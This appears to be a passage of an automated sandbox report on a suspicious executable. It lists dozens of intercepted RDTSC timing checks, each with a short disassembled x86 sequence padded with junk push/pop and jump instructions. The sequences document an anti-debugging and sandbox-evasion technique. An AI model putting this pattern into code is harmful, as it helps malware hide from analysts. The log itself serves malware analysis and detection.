                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27D8 second address: AF27E8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20D3D686h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27E8 second address: AF27EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27EC second address: AF27F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51DD second address: AF51ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51ED second address: AF51F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51F1 second address: AF51F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51F7 second address: AF5205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F5D20D3D68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF560B second address: AF5620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24760h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF7219 second address: AF721F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF721F second address: AF7224 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF7224 second address: AF7242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F5D20D3D693h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B00261 second address: B00269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B00269 second address: B0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6310A second address: A6311A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5D20C24756h 0x0000000a jno 00007F5D20C24756h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6311A second address: A63120 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFECF6 second address: AFED08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F5D20C2475Ch 0x0000000c jc 00007F5D20C24756h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFEFA1 second address: AFEFB1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D20D3D686h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFF67A second address: AFF69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5D20C2475Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jp 00007F5D20C24756h 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 jnp 00007F5D20C24756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0374C second address: B03750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B038AF second address: B038B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03B64 second address: B03B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03B68 second address: B03B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20C24762h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jnc 00007F5D20C24756h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03CEB second address: B03D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D694h 0x00000007 jmp 00007F5D20D3D698h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D21 second address: B03D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D25 second address: B03D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5D20D3D686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D20D3D68Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D3F second address: B03D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D43 second address: B03D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03D4F second address: B03D5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B07AE0 second address: B07AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D20D3D694h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0FD60 second address: B0FD7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24766h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0DF15 second address: B0DF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5D20D3D686h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F5D20D3D68Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E2F4 second address: B0E310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20C24766h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E310 second address: B0E336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F5D20D3D6CCh 0x0000000e pushad 0x0000000f jmp 00007F5D20D3D695h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E66F second address: B0E679 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E679 second address: B0E6A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jne 00007F5D20D3D686h 0x00000012 jl 00007F5D20D3D686h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b jmp 00007F5D20D3D68Ah 0x00000020 push eax 0x00000021 push edx 0x00000022 jnc 00007F5D20D3D686h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E6A6 second address: B0E6AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E6AA second address: B0E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0E9A6 second address: B0E9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F5D20C24756h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0ECDC second address: B0ECF0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F5D20D3D686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F5D20D3D68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0F544 second address: B0F54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0F54A second address: B0F583 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5D20D3D68Bh 0x00000012 jmp 00007F5D20D3D699h 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F5D20D3D686h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B15989 second address: B1598D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1598D second address: B15993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B15993 second address: B159A1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5D20C24758h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B159A1 second address: B159A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C31 second address: B19C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F5D20C2475Ch 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C48 second address: B19C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19C4C second address: B19C57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19622 second address: B19628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B19628 second address: B19643 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5D20C24766h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF35 second address: B1FF41 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20D3D686h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF41 second address: B1FF47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B1FF47 second address: B1FF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5D20D3D686h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200A9 second address: B200AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200AD second address: B200CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D20D3D690h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200CA second address: B200EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jmp 00007F5D20C2475Dh 0x0000000e pop edi 0x0000000f jnc 00007F5D20C2475Ah 0x00000015 pushad 0x00000016 popad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200EB second address: B200F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B200F0 second address: B200F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206DE second address: B206E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206E2 second address: B206E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B206E8 second address: B206F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B21518 second address: B2152D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B2152D second address: B21555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D20D3D690h 0x0000000b pushad 0x0000000c jmp 00007F5D20D3D68Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B21555 second address: B21561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5D20C24756h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B286B8 second address: B286D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F5D20D3D694h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B2C2F3 second address: B2C310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24767h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B38C2C second address: B38C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: A7089C second address: A708A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B44EF6 second address: B44F04 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 jc 00007F5D20D3D68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B4CB7F second address: B4CB9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B4E3FD second address: B4E403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: A5F81F second address: A5F838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 ja 00007F5D20C24756h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F5D20C24756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: A5F838 second address: A5F83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: A5F83C second address: A5F840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: A5F840 second address: A5F85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20D3D693h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B560DA second address: B56103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Fh 0x00000007 jnp 00007F5D20C24756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F5D20C24760h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B5656A second address: B56577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F5D20D3D68Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B56577 second address: B56580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B5682F second address: B56833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B56833 second address: B5684A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B5684A second address: B56850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B569CD second address: B569D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B569D1 second address: B569EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B569EE second address: B56A10 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D20C24762h 0x00000008 ja 00007F5D20C24756h 0x0000000e jnc 00007F5D20C24756h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jc 00007F5D20C24758h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B5DACC second address: B5DAD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B7B2D1 second address: B7B2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B8C97F second address: B8C988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B8C988 second address: B8C98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B8C98C second address: B8C9A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B8C9A2 second address: B8C9A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90A76 second address: B90A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90A7A second address: B90A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F5D20C24766h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90A98 second address: B90AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D691h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5D20D3D686h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90BD7 second address: B90BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24761h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exe | RDTSC instruction interceptor: First address: B90BEC second address: B90C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007F5D20D3D686h 0x0000000d jmp 00007F5D20D3D68Ah 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
